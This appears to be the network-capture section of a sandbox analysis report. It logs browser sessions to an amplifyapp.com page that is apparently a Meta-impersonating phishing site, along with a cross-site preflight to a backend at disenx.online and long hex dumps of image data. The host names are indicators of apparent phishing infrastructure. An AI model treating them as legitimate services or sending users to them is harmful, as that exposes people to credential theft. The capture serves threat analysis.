                                          2024-03-25 19:07:20 UTC10463INData Raw: 10 f7 81 a8 54 55 a4 b4 b0 cc f1 e2 f9 87 3b 7e 48 ff b7 24 b3 2f c2 13 e1 85 f0 ba 8a bc 6a 72 51 11 d4 9d 57 2a b6 22 8f 38 94 d3 4c a9 5f c0 66 0b 07 c3 c1 30 b8 4b 19 45 f6 4b d9 71 d4 22 ba bf b9 47 ca e1 60 c3 30 89 21 76 da d9 20 d9 70 b0 47 d8 5e 0f f8 8a 1a 3d 7f 21 96 60 9c bd b5 a1 cd 5a 4d 42 9a 1b a3 f0 61 e7 9e c1 3d ee fb e2 74 c3 5b a4 84 52 42 eb 94 d6 df de ca 3f f6 1c a7 27 89 e3 10 f9 66 7d 3c 78 65 87 29 63 f2 1f 14 a2 fa 90 d4 d5 87 7c 68 c7 d0 1d 78 3b ff d8 89 5a cc 6d b5 dc 0c 71 ef c9 dc f7 05 f7 b6 09 22 a2 bf c3 59 fc 83 64 6c f6 e9 ab a0 2b 2b fc fb 33 3e cd 9e e3 f4 66 07 6b 46 01 a8 3d fd 86 07 90 42 0f 1e 0e 4f 84 df 80 4f 01 a0 cb 55 9c 38 61 36 5d 51 19 00 fa b0 c1 b0 57 0c 07 55 b9 87 a5 bb 11 2b b4 49 61 a7 c9 33 85 5b
                                          Data Ascii: TU;~H$/jrQW*"8L_f0KEKq"G`0!v pG^=!`ZMBa=t[RB?'f}<xe)c|hx;Zmq"Ydl++3>fkF=BOOU8a6]QWU+Ia3[
                                          2024-03-25 19:07:20 UTC16384INData Raw: 08 18 24 42 30 b3 9d d5 6a d1 d7 bd 76 b5 54 e4 ba 2c 13 4d a7 44 d2 ff 08 54 9d 48 a2 c6 19 93 04 51 22 84 18 81 2c 20 84 08 42 57 0f f0 ee ed 0d b4 8c 52 94 a3 b3 3a 3c fb 9c 11 89 3d e9 07 49 ea 31 f4 12 93 fe 8c e3 07 49 ca ed df 1c 0c b3 98 50 0f c0 b1 3b f5 3d 97 06 42 e4 25 2b 41 e6 19 20 83 87 d4 f1 e6 83 d8 eb 9d 58 2b fc 6a f1 3c 08 61 1f c9 f0 d5 d9 9b 60 7f 27 f7 14 c9 15 6d 3c ce e6 6f 91 a4 27 db 20 be 1e f0 ed ef 30 6d 43 7b ab db ed ae 71 b4 52 f6 d8 05 65 db 86 e3 4b 4b 38 49 29 f2 92 7c b5 2e f8 78 27 90 5c 4f 01 d1 0d a4 66 24 c0 c9 bc 97 db f6 79 89 50 32 07 f5 29 bb b3 5f ab 02 17 aa 88 f9 3f 1f 82 29 ba 01 bd 06 bd 99 41 1d 82 35 3b b2 81 b1 d7 5e fb ec aa a2 20 51 f1 c1 45 7a 3f 09 59 41 5a 71 ad a6 64 dc 43 48 48 cd b1 94 1c e0 57
                                          Data Ascii: $B0jvT,MDTHQ", BWR:<=I1IP;=B%+A X+j<a`'m<o' 0mC{qReKK8I)|.x'\Of$yP2)_?)A5;^ QEz?YAZqdCHHW
                                          2024-03-25 19:07:20 UTC16384INData Raw: 99 ce 85 44 68 d1 65 c5 3b bd 54 d0 04 7c f0 eb 9a cf a8 3b b8 74 4a 1c 9d eb f2 ec f2 f5 f3 a1 be fa 57 ab f7 f8 73 fc 33 e5 48 10 af 9d 87 3e 36 35 4c 8a 24 7a e9 bb 5a fa 65 f9 b5 7a 2d eb d0 1d 27 db a7 0a 85 58 e1 64 19 7e ad d2 58 fb 24 a1 ac dd 95 a3 37 3f 11 f2 fe fd 91 0c b3 72 66 19 a0 be 43 ca 98 38 03 ee eb f0 ae 7c 69 c9 f2 02 f6 2b 48 44 55 34 49 d9 dc 25 69 f1 ea 66 da 7f b9 5b fa 65 ac 70 f7 e9 95 01 57 37 e9 fa bc bb df f8 b6 54 ab df 77 d8 75 9b da 1a f8 1d 42 6a a9 44 b6 54 33 e1 3f 2e 65 98 7d cb 89 7e 9a 8c e7 f9 0e 21 75 ca f8 f0 ee 90 72 9c 32 7a 3c 47 df 56 9d 95 49 b0 fa 66 eb 0b 49 0f 8c ec e9 a6 ef eb 8e 51 12 f8 d9 72 59 21 f4 73 f3 b8 e3 56 f0 4e e7 58 73 6d 59 12 71 bb 39 48 da 2b 35 8b c5 9a 56 2b 16 cd 34 51 7b 9f 2f cd 36
                                          Data Ascii: Dhe;T|;tJWs3H>65L$zZez-'Xd~X$7?rfC8|i+HDU4I%if[epW7TwuBjDT3?.e}~!ur2z<GVIfIQrY!sVNXsmYq9H+5V+4Q{/6
                                          2024-03-25 19:07:20 UTC8949INData Raw: 56 b3 e9 7b 80 fd 47 90 a3 ae fe e7 6f a2 9c 5b ed a8 60 5b 22 7c 32 6a 5b 9c d3 9b 44 cb 2a 1a 36 f4 6d 20 cb d8 3f b1 32 68 84 b6 2d 4b 9a 6e 98 2a 1a cf 01 54 d3 d0 35 49 b6 ed b0 31 58 39 e1 63 59 26 08 fd f6 38 d6 eb d5 cc 46 10 45 83 f7 34 cc 5a af 77 6c 10 45 41 7f 80 df e4 93 62 3c 42 46 13 92 1c b8 4d 0f 97 df 13 4e 1f 0c 5d c7 67 d8 55 06 4b bd 84 66 11 e9 f9 a4 48 da 2e 17 f7 33 54 80 f4 1e b4 ac 0c 37 1a 5b 21 32 1d e3 46 09 7e 84 f2 e5 66 98 62 b8 20 3a 83 e8 f1 6a 03 74 4c 76 37 38 d0 07 31 47 12 01 7e 2e 07 2b 32 07 08 3e 0d 2e 25 24 64 c6 23 73 08 dd 03 2c 5a be 9b 28 cc b2 1d 6b 7d 7d 6d b1 eb 3a 5c 14 05 22 2c ba ec 3f 2f 84 75 5d e2 5c 30 5a ad 15 2e 09 0a 9c 7c 37 11 88 20 8a dc 71 bb 8b 6b eb eb 96 63 5b 4c 79 5d be ae d7 c3 05 5d 90
                                          Data Ascii: V{Go[`["|2j[D*6m ?2h-Kn*T5I1X9cY&8FE4ZwlEAb<BFMN]gUKfH.3T7[!2F~fb :jtLv781G~.+2>.%$d#s,Z(k}}m:\",?/u]\0Z.|7 qkc[Ly]]
                                          2024-03-25 19:07:20 UTC7435INData Raw: ef ed 96 c5 f9 db 1f f4 3d 4c 28 69 1c 42 dc b7 97 74 f2 56 84 5a fc 9e 48 3c 23 fe 97 6a 26 76 57 0e f3 ec 51 ad 14 ce 35 62 a6 ee 38 1d 03 87 e8 60 30 5a 8e 82 00 04 53 03 6c 62 51 50 83 82 e7 0d 80 a2 fd 77 15 c5 d0 95 77 6a da bb 98 26 72 c6 66 aa a7 19 f2 3e 1c 32 41 58 25 ac 9b d0 3f 80 20 88 42 99 ea 16 80 68 9a b5 5a 6f 6b be 83 b7 0c 45 61 af 53 4d 53 7d bd e1 d4 7a 2c 7c 44 6c 2a 40 d2 96 80 12 87 8c 09 af a8 5b 5c da 5a 3e db d5 09 f8 33 c4 43 25 c9 55 4d ac f9 2f 4e de 67 28 8a b8 26 e9 ef 73 4e 51 93 0e 5b 63 f1 57 d7 44 45 31 de a7 4b 5f c1 89 ed 48 06 b5 85 8b ab 5b 38 19 54 72 1a 43 37 c1 8f 09 d7 39 82 c2 69 6e a9 37 76 a2 c8 17 15 42 8d cb 06 25 ca 45 59 09 1f 08 68 3c f6 0d 91 f7 54 43 07 d0 0d 75 4f 3e 86 34 65 38 93 e9 33 5b 9c 34 d8
                                          Data Ascii: =L(iBtVZH<#j&vWQ5b8`0ZSlbQPwwj&rf>2AX%? BhZokEaSMS}z,|Dl*@[\Z>3C%UM/Ng(&sNQ[cWDE1K_H[8TrC79in7vB%EYh<TCuO>4e83[4
                                          2024-03-25 19:07:20 UTC16384INData Raw: b2 8e fb 83 7e ab bc ba 8e fb 31 0b 17 6b 85 2b eb fa 4a f5 32 58 d6 b2 2e f4 07 6e 12 75 59 df f7 09 86 7c 78 37 50 2f 7a 8e 2b 51 2a 31 02 16 5d 9f d6 fb 91 66 fc 3c 4d 6d c1 2d 05 62 1a c1 d9 90 82 48 88 38 9e 95 bf f8 33 2a 7c 23 a3 81 5a d9 3f 20 4c cf 92 25 0c 00 a2 4c 24 00 2c ca a6 eb 19 b2 88 01 24 4a e7 36 4b b2 e5 59 9a a3 bb a4 af 9b f4 47 66 48 5c 4e 37 23 8f 88 92 e4 46 91 2b 89 e2 fb 39 12 f1 9b a6 fe 54 b7 c0 57 16 14 55 50 87 ef 73 26 a8 ca 02 21 f3 18 75 15 2c 20 9b 4f c9 00 1a 11 b9 78 34 11 c0 22 d1 be b7 c0 40 7e 29 89 fb 48 83 68 00 f2 d8 db 10 d8 03 f2 fd 2b f8 5f 25 c1 14 05 41 34 85 1f 91 74 f3 fa de cd cf 24 d5 bd 54 39 fa 21 52 4d 4d 82 75 cb 5a e0 a1 76 6c 39 8d 3b 08 e3 b2 09 5c 8c e0 b8 54 ba e7 18 c5 0f 23 e0 49 aa 68 1d 1b
                                          Data Ascii: ~1k+J2X.nuY|x7P/z+Q*1]f<Mm-bH83*|#Z? L%L$,$J6KYGfH\N7#F+9TWUPs&!u, Ox4"@~)Hh+_%A4t$T9!RMMuZvl9;\T#Ih
                                          2024-03-25 19:07:20 UTC16384INData Raw: 18 27 46 17 44 63 d4 43 ab 68 5d 3f 6e 43 b8 b2 40 04 3c 37 d4 cf 54 a2 cd 0b 47 37 c1 33 7a 83 90 f5 e3 31 f2 83 83 7c a9 1a f9 f9 88 09 a6 d9 65 35 d1 02 0e 67 13 d9 78 d7 a7 6a 28 44 89 bf 39 5c e4 28 45 fe d7 48 25 12 0d 5a b1 f5 6a db a7 e0 1c 13 0f b3 61 60 e1 c7 d4 a5 b6 e6 2a 18 91 63 64 f2 9b 43 71 97 28 8a fc 55 19 94 68 91 47 69 d9 3d 34 b3 80 28 8a fc 35 0a ca ab f3 7b 04 37 83 83 ef 43 ae 2a 40 bf 26 2b 0a 71 e5 d7 a9 2d 46 87 be 1d a1 80 fc 55 59 51 08 8c 14 d2 7b e5 8d 26 a0 ee ab 92 8c 64 1a a0 ac 42 74 46 c7 64 21 52 ca 3c 1b 36 41 80 1e 71 6e 6f 4a 30 e5 16 1f 56 66 c4 f2 27 08 e9 f3 d2 84 8d 47 19 7b a8 d9 b3 b0 b4 23 3d 4a 2b b8 f5 8f 9e d0 23 ee 61 9c 28 a6 3d ec 63 42 be 77 93 67 60 dc 75 50 3d 4d 5d 6f 9f d9 6c 90 35 dd 43 01 11 8e
                                          Data Ascii: 'FDcCh]?nC@<7TG73z1|e5gxj(D9\(EH%Zja`*cdCq(UhGi=4(5{7C*@&+q-FUYQ{&dBtFd!R<6AqnoJ0Vf'G{#=J+#a(=cBwg`uP=M]ol5C
                                          2024-03-25 19:07:20 UTC16384INData Raw: 11 38 0e 3e 3d 9b cd 66 7b 13 58 a5 c4 8f 4f c2 b4 e4 50 ab 7d 2f f7 7c 5b 6f f6 b4 ed f7 7a 9b bd de fe d4 6d 7a be ad 7b 9b da f6 7b 1d 83 0f 90 59 79 97 5a 87 7e 48 7d d5 b6 4d d2 41 52 1e 41 5b 3f d4 d9 5d 8e eb f2 8f 13 9e 56 8c 93 b0 d7 db 18 f5 7a 11 66 5c ee 9c 3e 73 fc ff 39 15 ab e5 d7 31 63 6a 15 fc f0 55 ba aa 18 c3 01 40 f0 d0 d9 df 01 bf fb 11 11 08 7f 2c ab 98 8a 6d 2b 28 97 1c 55 c4 43 ae 26 f9 fc 73 3f 7b 98 b9 83 13 e8 e0 b9 eb 27 6a a8 62 3a 37 5b c0 6e f9 74 5d 83 7f 75 bf c0 7a e7 f8 16 e4 1b 23 12 9c af d9 22 de 1f f4 e3 7c 0b f9 da 91 ed 6c f4 d9 29 b6 60 34 d8 7e b5 d0 85 53 3f 26 d3 45 c3 18 63 98 f4 16 6f 10 65 e0 b9 a5 92 eb 01 65 f8 70 83 0f 33 fa 08 32 8a 2f ec 0d dd 09 08 11 e6 00 38 8c 20 04 04 10 ab c5 31 42 71 5c 63 8b 52
                                          Data Ascii: 8>=f{XOP}/|[ozmz{{YyZ~H}MARA[?]Vzf\>s91cjU@,m+(UC&s?{'jb:7[nt]uz#"|l)`4~S?&Ecoeep32/8 1Bq\cR
                                          2024-03-25 19:07:20 UTC16384INData Raw: 04 01 3b 4d 51 f3 08 c9 72 32 a0 8e 83 f0 37 66 3b 34 10 0f e4 c6 1f a3 74 46 41 01 65 64 88 e9 29 46 30 6e 21 d4 c2 98 b0 53 14 0f 09 5b 61 d6 cc b2 84 e5 c9 49 3f 1c 5b ca 9a 5a db d6 ae 75 ad 75 3a 96 31 f7 e0 a3 75 94 f3 74 34 1d bd cd 04 23 b5 df 3b d2 81 4d 5a 25 fe 00 2e 14 e9 34 5f 07 3e e2 79 3a 75 61 54 0c 94 1b cf f3 83 f1 52 dc 9a 3c 39 99 3c 39 b9 66 cc b4 76 5f b9 e9 94 4a ce e6 2b 5d ad d9 78 ee 1f dd b2 bf de 9e d2 74 32 89 e3 a5 17 57 ab 93 8f 2f c5 71 1c 2f c5 4f 54 ab 93 77 b4 db 93 f3 e7 cf 9f bf 5b 6a 4f e9 8b 21 40 78 51 6b 57 cb bb ef 96 da d5 fa de 08 20 ba f7 cb 6b 3e 9f e7 9b 2b 2b 9b 79 fe 9e 76 fb 9e 95 15 0b ce d4 a8 58 4b d6 31 0e b3 00 0b 8d d6 61 39 9d a5 ea 75 58 06 ef f6 8c 84 3e 04 13 10 49 1f 02 4c 4b 40 46 d5 34 8d 2b
                                          Data Ascii: ;MQr27f;4tFAed)F0n!S[aI?[Zuu:1ut4#;MZ%.4_>y:uaTR<9<9fv_J+]xt2W/q/OTw[jO!@xQkW k>++yvXK1a9uX>ILK@F4+


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.64971813.249.39.104435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC673OUTGET /img/metaTextLogo.e8c807fc3bccff5a9b1f.7b511c1b.png HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:20 UTC524INHTTP/1.1 200 OK
                                          Content-Type: image/png
                                          Content-Length: 73614
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:20 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "7fe0c84197452b900619714dd637e85c"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 841dfa6074cf4b3b0718988f088a4ac2.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: NmZ_Seq4W8bK2HympnFvrZEBZqqj1pygyVFmRK0dNModsUN3Horyvw==
                                          2024-03-25 19:07:20 UTC8192INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0a 00 00 00 02 04 08 06 00 00 00 d5 2a 77 a9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 80 00 49 44 41 54 78 da ec dd 77 78 5b e5 d9 c7 f1 df 7d 24 8f ec b0 12 b0 65 67 10 46 22 27 10 cb 81 06 68 49 81 b6 94 d1 1d 3a 28 33 83 d1 42 81 b2 5a 20 51 c2 86 b4 94 52 56 12 a0 40 27 e9 a6 a5 1b 28 5d 8c 38 50 88 13 28 23 71 e2 84 5d 32 80 38 b6 74 ee f7 8f d0 be b4 05 1a cb 96 74 24 7d 3f d7 e5 ab 40 21 b6 bf 47 3a 3a 92 6e 3d 8f 09 40 6e a6 3d d5 24 ab da 5d 0a 93 32 6b 94 6b a4 a4 6d 64 36 50 ae 01 92 f7 93 54 23
                                          Data Ascii: PNGIHDR*wgAMAa cHRMz&u0`:pQ<bKGDIDATxwx[}$egF"'hI:(3BZ QRV@'(]8P(#q]28tt$}?@!G::n=@n=$]2kkmd6PT#
                                          2024-03-25 19:07:20 UTC16384INData Raw: fb 77 fd f6 2e 1b 24 b5 bd f1 f5 ff a6 7a 4c 03 57 ed a6 40 29 49 29 99 9a 25 ed 25 89 17 c4 f1 56 3e a9 8e 55 ab 24 9d 1d 89 9f e6 c2 4d a3 14 ea 5b 92 62 1c 9a 5e eb 90 eb 93 4a 57 ff 85 14 a5 70 2d 61 dd 92 ce 51 ba fb d7 32 dd 2e a9 8e 28 05 64 fe 39 a5 33 bf 55 3a fe 33 62 00 40 49 db ed 85 4e cd 90 74 1d 29 80 f2 57 3f b6 f9 5d 92 7d 8c 12 00 00 00 00 00 00 c0 5b 63 00 70 6b a5 3d ae 8e 55 f7 49 ce 6a 3d 15 c5 32 92 3f 29 d7 0f b5 e1 b5 cb 0b 32 f0 b7 b5 16 59 56 d2 b2 37 be 6e 97 24 9d be ba 9f 5e 0d f7 55 a8 83 64 3a 48 52 8a 63 88 37 39 4b 33 da 57 6b c1 88 6b 8a 7c 3e 1d a8 30 f3 33 89 ad d4 7b 7f 8a d2 dd 8a c5 3f a3 f3 ec 79 62 94 da 75 45 d5 dd ba c4 f7 54 77 e6 16 49 87 12 a4 80 f7 1a f3 9b 94 f6 3d 94 b6 b5 e4 00 80 d2 e5 52 7a 74 2a f5 ed
                                          Data Ascii: w.$zLW@)I)%%V>U$M[b^JWp-aQ2.(d93U:3b@INt)W?]}[cpk=UIj=2?)2YV7n$^Ud:HRc79K3Wkk|>03{?ybuETwI=Rzt*
                                          2024-03-25 19:07:20 UTC8710INData Raw: 34 9d 12 39 b9 67 cd d2 d6 5f 90 01 28 ae 44 53 f3 67 25 9f 49 09 00 3d 50 63 0a be 33 72 e4 94 5a 52 00 00 de 42 90 51 f7 b7 24 ed 44 0a 00 95 ae ef a7 4b b6 1d b8 bf a4 41 a4 cd a3 50 b7 13 01 88 88 0b bb 4f 90 db 94 be bf 5c 7d 63 2b e0 97 5e 66 9d 94 08 3d 89 90 ec 46 a5 3d a5 b4 b1 6a 04 90 4f e9 ea c5 9a 93 79 4a f2 31 c4 d8 da eb c3 ee 43 25 5d 47 08 00 51 16 cf 66 bf 9c 89 c5 3e 2a 89 37 ef 72 64 f2 cb c7 8c 19 73 e7 53 4f 3d b5 99 1a 15 78 fc b3 e1 15 92 55 51 a2 e7 57 4a 41 e0 67 91 01 28 ae ba 71 2d 13 e5 be 80 12 15 e7 65 49 6b 24 ad 96 6c 8d b9 5e 52 e0 af b8 6b 9d cb d6 79 68 eb 62 ca 74 59 dc 5e fb ff ff 24 f6 4a 26 13 0e 8d c7 dd 24 29 e3 b1 1a 65 d5 3f a6 70 a0 02 1f ea 66 43 14 fa 50 99 6d 23 a9 5e f2 3a c9 12 92 76 94 54 4d f2 b2 34 ae
                                          Data Ascii: 49g_(DSg%I=Pc3rZRBQ$DKAPO\}c+^f=F=jOyJ1C%]GQf>*7rdsSO=xUQWJAg(q-eIk$l^RkyhbtY^$J&$)e?pfCPm#^:vTM4
                                          2024-03-25 19:07:20 UTC8949INData Raw: 00 f5 a8 a7 6b c1 bd 72 fb 36 25 4a 67 b2 f7 b7 4e 9c f1 4a 4a 14 6f cc a4 49 7b 4b 7e 36 25 4a f2 c7 d5 5d 8b 7e 4b 06 60 90 cf 01 66 9f a0 42 24 1e 68 e9 7b 96 d7 74 30 18 42 59 70 16 19 8a e4 c1 87 89 00 00 f1 19 37 6e 5c b3 9b de 4f 89 58 74 69 58 d3 c9 64 40 35 eb 5e b9 f0 57 92 ae a0 44 65 14 b6 00 50 e1 54 52 c5 81 cb ff 02 d1 3e a5 72 97 4a 7e 30 21 4a f2 53 5d 39 e2 66 49 37 91 a2 4a b8 9f a8 13 d7 1f 41 08 a0 00 b3 5b 1e 93 f4 14 21 0a 92 94 06 26 90 01 40 dd 4a 0d 9c 23 69 2b 21 4a 9f 55 05 ee 57 89 ad bc 8b 16 e6 9b b2 92 f6 a1 44 f1 e9 42 b7 33 c8 00 0c ae b6 c9 47 b5 4b fe 06 4a 44 71 50 0b 3e fb d0 43 0f f5 51 02 83 a1 7b f9 c2 79 92 7e 41 89 62 f8 7f 33 f6 05 80 f8 6c 6b 1e f1 76 49 7b 53 22 72 39 b3 f0 63 dd f3 e7 6f 23 05 aa 7e 8c 3a 72
                                          Data Ascii: kr6%JgNJJoI{K~6%J]~K`fB$h{t0BYp7n\OXtiXd@5^WDePTR>rJ~0!JS]9fI7JA[!&@J#i+!JUWDB3GKJDqP>CQ{y~Ab3lkvI{S"r9co#~:r
                                          2024-03-25 19:07:20 UTC16384INData Raw: 2f 19 00 c4 e9 9f 0b 77 78 a3 2f da 33 1f 0b 00 51 ff 9e ce 9d 2f 69 02 21 22 d1 2d 4f 5e 4d 86 17 b8 65 cc 77 25 fd 91 10 31 28 6d e7 c2 b7 e8 a4 75 ef 24 1e 6a 7c 80 f6 14 0d 0a ea c4 0e 80 00 50 ce c0 7e c2 21 5f 96 89 cb a8 96 73 26 72 5d a9 99 33 13 45 0f 73 73 c9 4b 25 ed 41 c1 a2 f5 f4 27 06 ae 21 03 50 3f 9a c3 d4 01 54 00 80 78 98 f9 28 2a 00 68 f0 59 3b 0b 00 4b eb f6 28 0d 00 c4 ed 9f 97 00 66 c0 1a e9 0c 80 05 80 a8 73 73 fb 26 49 3a 9b 10 51 1d 33 ec 6c 65 6d 2b 21 5e 2a 71 a2 a4 01 3a 54 cb dc 24 b8 5e c7 3f b1 17 21 50 c3 07 db 27 69 50 90 e1 24 00 80 32 dc 71 47 5e a1 9d 45 88 b2 4c ee 58 f1 f0 47 8a f9 0b 6d e9 a9 47 b8 f4 61 d2 95 30 cc 97 ce 5f bf 74 e9 73 94 00 ea 68 e6 63 01 97 ff 05 80 b8 c6 4e 2e 3e 38 09 a0 d1 71 1c 2c 6d ee fd 38
                                          Data Ascii: /wx/3Q/i!"-O^Mew%1(mu$j|P~!_s&r]3EssK%A'!P?Tx(*hY;K(fss&I:Q3lem+!^*q:T$^?!P'iP$2qG^ELXGmGa0_tshcN.>8q,m8
                                          2024-03-25 19:07:20 UTC3875INData Raw: 98 5d 0b ef 72 e9 77 94 18 c4 d1 a6 e9 a4 f6 0d 9b 7f 39 7a f2 64 36 63 6a 10 ed e9 a3 f7 69 4f 4f fb 81 c9 bf 26 69 2f 8a d4 be d2 df 88 9d 35 e4 af 92 9e ad 8f 91 4c dd df cf 87 c9 ed 56 6d cd 75 6b ce c0 e7 35 b7 6f 52 d5 fe a4 57 fa 9e 9a 9b fb a8 e6 0c cc 53 98 78 50 d2 b9 92 46 f0 54 ad a9 27 d4 63 4a 25 ff 97 0e c0 20 b9 61 ff 9b 65 fa 29 21 aa 7b 1e 55 c2 7f 1b 23 0f ae 96 9a 56 eb ec 67 bf a0 73 9e 9e 5a 95 bf 5a d6 f7 d0 85 db 2e d3 ac 6d eb 34 90 5f 24 f7 d7 ca 58 52 3a 48 0f 33 97 27 66 11 02 00 00 00 40 d4 82 20 71 b6 a4 3e 4a 54 9a 4f cf 25 12 0b 3a d2 d3 de 44 0b 94 ab 63 62 e6 90 8e 89 d3 7e 67 a6 ef 4b da af 86 7e f4 37 b5 af 78 e4 12 ee 41 bc 50 f7 b2 ce 2e 49 cf 50 22 ca 53 8e 7d 89 45 e7 a8 f8 18 53 c1 f9 62 a7 e9 c1 f6 c6 64 3e b5 b4
                                          Data Ascii: ]rw9zd6cjiOO&i/5LVmuk5oRWSxPFT'cJ% ae)!{U#VgsZZ.m4_$XR:H3'f@ q>JTO%:Dcb~gK~7xAP.IP"S}ESbd>
                                          2024-03-25 19:07:20 UTC11120INData Raw: bf 47 17 a6 b6 92 02 a8 63 fb 8e 9a a3 27 d7 67 24 7b 1b 31 6a 1c a3 ae 46 bb c3 37 e9 c2 04 bb a3 01 00 00 00 a8 5a 4d 2d f6 c9 fe 5e 4d 91 74 08 35 ea 60 16 2a 8d 95 fc 58 49 c7 e6 06 12 f9 f6 f4 f4 7b a4 f0 af a6 e0 ae 81 a6 fc fc 46 bd cc 6a c7 61 53 5b f3 49 cb 04 16 64 cc 35 cd e5 99 9c c2 56 b9 f1 5a 4d 95 70 b7 e3 3a 26 66 96 ac 5e de 79 33 35 1a 43 be c5 7f 1a f4 6a 93 a4 61 d4 a8 6a 81 a4 b4 a4 b4 bb 7f d2 e4 7a 56 2d b9 b6 74 e6 c1 c0 b4 dc 5d 0f 4b fe 68 60 c1 a3 b9 40 8f ef b1 35 b1 f6 a1 87 ee de 54 a9 1f ee e0 4c 66 f8 b6 ad e1 88 44 c2 86 5b de 47 28 48 b4 ba f9 68 b9 0e 30 e9 00 97 46 bb 34 c6 a4 83 5c 6a 71 49 f6 fc c2 3e df 7e f0 e1 1e 8e 41 73 8b 4e e9 ef d5 eb 25 8d a1 46 c3 48 48 7a 85 5c af 70 e9 5d 32 53 20 97 36 f5 ab 3d 9d d9 60
                                          Data Ascii: Gc'g${1jF7ZM-^Mt5`*XI{FjaS[Id5VZMp:&f^y35CjajzV-t]Kh`@5TLfD[G(Hh0F4\jqI>~AsN%FHHz\p]2S 6=`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.649715198.54.126.1154435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC559OUTOPTIONS /api/fetch/ban HTTP/1.1
                                          Host: disenx.online
                                          Connection: keep-alive
                                          Accept: */*
                                          Access-Control-Request-Method: POST
                                          Access-Control-Request-Headers: content-type
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:20 UTC473INHTTP/1.1 204 No Content
                                          keep-alive: timeout=5, max=100
                                          x-powered-by: PHP/8.0.30
                                          cache-control: no-cache, private
                                          access-control-allow-origin: *
                                          vary: Access-Control-Request-Method, Access-Control-Request-Headers
                                          access-control-allow-methods: POST
                                          access-control-allow-headers: content-type
                                          access-control-max-age: 0
                                          content-type: text/html; charset=UTF-8
                                          date: Mon, 25 Mar 2024 19:07:20 GMT
                                          server: LiteSpeed
                                          x-turbo-charged-by: LiteSpeed
                                          connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.64972023.221.242.90443
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          Accept-Encoding: identity
                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                          Range: bytes=0-2147483646
                                          User-Agent: Microsoft BITS/7.8
                                          Host: fs.microsoft.com
                                          2024-03-25 19:07:20 UTC773INHTTP/1.1 200 OK
                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                          ApiVersion: Distribute 1.1
                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                          X-CID: 7
                                          X-CCC: US
                                          X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z
                                          X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z
                                          Content-Type: application/octet-stream
                                          X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                          Cache-Control: public, max-age=47117
                                          Date: Mon, 25 Mar 2024 19:07:20 GMT
                                          Content-Length: 55
                                          Connection: close
                                          X-CID: 2
                                          2024-03-25 19:07:20 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.649721104.26.13.2054435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
